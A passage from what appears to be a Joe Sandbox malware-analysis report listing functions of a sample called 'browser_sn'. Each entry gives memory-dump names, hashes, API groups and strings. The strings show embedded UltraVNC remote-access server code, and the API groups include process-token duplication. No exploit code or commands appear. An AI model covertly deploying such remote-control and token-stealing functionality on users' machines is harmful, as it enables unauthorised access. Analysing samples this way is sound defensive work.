                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                                            • String ID: This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted.$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$vncclient.cpp : no password specified for server - client rejected
                                                                            • API String ID: 1063416079-3080451256
                                                                            • Opcode ID: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
                                                                            • Instruction ID: 1ab6f4149edff883b8c203050c01ea21dd94a9615d9a698508126907fb76dbcd
                                                                            • Opcode Fuzzy Hash: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
                                                                            • Instruction Fuzzy Hash: 2C31832161868281EB50DF25E8512BA6361FF85BBDF545732EEBEC77D5DEACD4018300
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$EnterErrorExceptionLastObjectRaiseSingleValueWait
                                                                            • String ID:
                                                                            • API String ID: 824239979-0
                                                                            • Opcode ID: 12bf6ecd7088038fd47cecf56f3922a6986b1dec9d24cf819874f6182f192e8f
                                                                            • Instruction ID: d5a5e178a1c7a0a5f16581ebe2d656ff9bfdcd4037d29d97e1cd2420ae1d1ca5
                                                                            • Opcode Fuzzy Hash: 12bf6ecd7088038fd47cecf56f3922a6986b1dec9d24cf819874f6182f192e8f
                                                                            • Instruction Fuzzy Hash: 8E218222A28A4692EBC1DF21E44517A7370FB94B8AF445032EF8E83795DFBCD489C740
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleToken$OpenProcess$CreateDuplicateFirstInformationProcess32SnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 3355884492-0
                                                                            • Opcode ID: 6104325d5a1b9d43be635a96be43e70745f11669b1d82cc91958b0e9663c2412
                                                                            • Instruction ID: 35dcb763e789bd1253c510f30485433a0c4db4a0d6c873634f6e411b6f49d0f9
                                                                            • Opcode Fuzzy Hash: 6104325d5a1b9d43be635a96be43e70745f11669b1d82cc91958b0e9663c2412
                                                                            • Instruction Fuzzy Hash: D7218D25A1868282E750AF29F44422AA7B0BF997DEF004135DFDD83B65CFBCD445E740
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno_fileno_flush_freebuf_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 3613856401-0
                                                                            • Opcode ID: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
                                                                            • Instruction ID: 9681c74eed1b9d6bc404fdd7cfa84c8ff6ac312f7381998d07f9c43d338779d2
                                                                            • Opcode Fuzzy Hash: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
                                                                            • Instruction Fuzzy Hash: 8A012C12E5864241FA94AE6698513F911A06F9576EF290B30EFA9C73C2CEBCE8418340
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C437CE
                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C437DC
                                                                            • SetLastError.KERNEL32(?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C43834
                                                                              • Part of subcall function 00007FF6C2C432EC: Sleep.KERNEL32(?,?,?,00007FF6C2C437F7,?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19), ref: 00007FF6C2C43331
                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C43808
                                                                            • free.LIBCMT ref: 00007FF6C2C4382B
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00007FF6C2C4381C
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                            • String ID:
                                                                            • API String ID: 3106088686-0
                                                                            • Opcode ID: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
                                                                            • Instruction ID: 76f6a12bc87ca692e646b66b8a3f0056fca99993ac5d6846380076168b52b687
                                                                            • Opcode Fuzzy Hash: 5f2b5b5caa0b08d9e115ab91103603327581cb969fb76fc374ee9c9b2b7431f5
                                                                            • Instruction Fuzzy Hash: 33017124A0974382FAC4AF75E44407972B1BF8879AB188A35CFAE873D5DF7CE405C610
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                            • String ID:
                                                                            • API String ID: 2426525106-0
                                                                            • Opcode ID: 3d019ec6239ca241c2487075fcffbc8e2330726c6abefad2d031d43e165b0baa
                                                                            • Instruction ID: 4f77f12bad52132619cd386fe663d98cf49e0b44bcaae04e3dbdaa522b39d7dc
                                                                            • Opcode Fuzzy Hash: 3d019ec6239ca241c2487075fcffbc8e2330726c6abefad2d031d43e165b0baa
                                                                            • Instruction Fuzzy Hash: 5701FF22618A4296DB84DF16E9901B87334FF88B89B404531DF8DC3761CFA9E5B5C300
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                            • String ID:
                                                                            • API String ID: 2426525106-0
                                                                            • Opcode ID: 519421b3b674e42368a913bd218afa9024c234a5df41dca482dc94a54fba9521
                                                                            • Instruction ID: 76ecf42921962d50dfee69aa704be8f296310ea9ac4a8eff5472476b98105841
                                                                            • Opcode Fuzzy Hash: 519421b3b674e42368a913bd218afa9024c234a5df41dca482dc94a54fba9521
                                                                            • Instruction Fuzzy Hash: 72F06766A58A4285EB80DF25DC910B87334FF88F4EB404571CE8DC7365CFA9D955C350
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                            • String ID:
                                                                            • API String ID: 2426525106-0
                                                                            • Opcode ID: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
                                                                            • Instruction ID: 76ecf42921962d50dfee69aa704be8f296310ea9ac4a8eff5472476b98105841
                                                                            • Opcode Fuzzy Hash: ed0781dc8889168bce117aea87ed44a54f9bb397e4d36f2ca679cd736364b467
                                                                            • Instruction Fuzzy Hash: 72F06766A58A4285EB80DF25DC910B87334FF88F4EB404571CE8DC7365CFA9D955C350
                                                                            APIs
                                                                            Strings
                                                                            • vncclient.cpp : Compress returned error in File Send :%d, xrefs: 00007FF6C2BABA26
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$EnterFileRead
                                                                            • String ID: vncclient.cpp : Compress returned error in File Send :%d
                                                                            • API String ID: 3826087893-1161645139
                                                                            • Opcode ID: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
                                                                            • Instruction ID: b15c9a6e761fcc27f5a39c17955112edc1b6cc626f208735d8132b23350e8bc5
                                                                            • Opcode Fuzzy Hash: a901618a62c2e900ccc2fab75a1467ef20a867966cfe858518b3aa7bba12f5c0
                                                                            • Instruction Fuzzy Hash: E8B1B032A08A42C9E7548F25C8403BD37A1EB56B5EF44013ADEAE8B7D9CEB8E441C754
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: EnumDisplayDevicesA$USER32
                                                                            • API String ID: 145871493-2970514552
                                                                            • Opcode ID: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
                                                                            • Instruction ID: e41c5999d4a81be14b82a5d4443ddd038c4d0c01656d9c32d3494edd018c64fe
                                                                            • Opcode Fuzzy Hash: ce794e2cbdb766f9e1c0efda30611b8e823122e68f144a872fe4c48864dd2d5a
                                                                            • Instruction Fuzzy Hash: 8631D336608B8281EA60CF15E4442EA72A0FB8679DF540136DEDD83789EF7CD801C700
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: EnumDisplayDevicesA$USER32
                                                                            • API String ID: 145871493-2970514552
                                                                            • Opcode ID: d63241eccbf7de335e5bf3da54cc8ef173d0710342ef8f715da4294a33c1ad9f
                                                                            • Instruction ID: 6386f9a900cd6fa43cf4ee7d7d3a21cbb2dd664d72b37476d844773289461ca5
                                                                            • Opcode Fuzzy Hash: d63241eccbf7de335e5bf3da54cc8ef173d0710342ef8f715da4294a33c1ad9f
                                                                            • Instruction Fuzzy Hash: C5319031A08B8285EAA1CF15E4446E967B0FB8AB9DF580235DEDD83798DF7CE5018B00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: EnumDisplayDevicesA$USER32
                                                                            • API String ID: 145871493-2970514552
                                                                            • Opcode ID: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                                            • Instruction ID: 1d721e85b6f952a8e12ad950f595562daaddd5fab908c29b0bb9f137b11495c6
                                                                            • Opcode Fuzzy Hash: c302339970f6293fc38423b47487169b7c7610065756fe4ae123da4c8d70ed68
                                                                            • Instruction Fuzzy Hash: 67315032608B8686EBA0CF15A4546E963B0FB8ABA9F544275DEDD83798DF7CD4068700
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: CSDVersion$Software\Microsoft\Windows NT\CurrentVersion
                                                                            • API String ID: 3677997916-605553437
                                                                            • Opcode ID: e687beb703156b10d4b9a4dc2033f7a7f464ba5dff228a3a31641666442cd2e3
                                                                            • Instruction ID: d7f4ad4629e1241bb266c75e46892440b983b793e34f872d952a90e143766ef5
                                                                            • Opcode Fuzzy Hash: e687beb703156b10d4b9a4dc2033f7a7f464ba5dff228a3a31641666442cd2e3
                                                                            • Instruction Fuzzy Hash: 03318161A1968381EBA08F20E49077A77A0FB8535EF401232FBDE87B94DFADD455CB00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
